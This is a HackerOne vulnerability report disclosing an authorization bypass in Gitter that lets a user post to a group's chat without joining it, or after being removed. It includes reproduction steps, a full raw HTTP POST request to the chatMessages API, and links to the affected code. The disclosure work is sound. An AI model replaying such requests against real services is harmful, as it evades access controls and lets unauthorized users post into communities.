Bypass "Only GitHub users" setting and send message in room via API without joining

HackerOne report #469272 by cache-money on 2018-12-18:

Summary: It's possible to post to a group on Gitter without actually joining the group. Your messages come up as if you're a member.

Steps To Reproduce:

1. Login to Gitter and click into a group. Look at the request to /api/v1/user/[GROUP ID]/rooms to get the Group ID.
2. Play the following request with that Group ID and notice the message will be posted.

POST /api/v1/rooms/[GROUP ID]/chatMessages HTTP/1.1
Host: gitter.im
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://gitter.im/MakoChat/community/~chat
Content-Type: application/json
x-access-token: [TOKEN]
X-Requested-With: XMLHttpRequest
Content-Length: 21
Cookie: [COOKIES]
DNT: 1
Connection: close

{"text":":thumbsup:"}

Impact

You can post to groups without ever joining or after you've been removed.

Relevant code

• https://gitlab.com/gitlab-org/gitter/webapp/blob/3ea61ae3eb51470ab35798b051ce3b1997d1514c/server/api/v1/rooms/chat-messages.js#L81-93
• https://gitlab.com/gitlab-org/gitter/webapp/blob/3ea61ae3eb51470ab35798b051ce3b1997d1514c/modules/chats/lib/chat-service.js#L128-225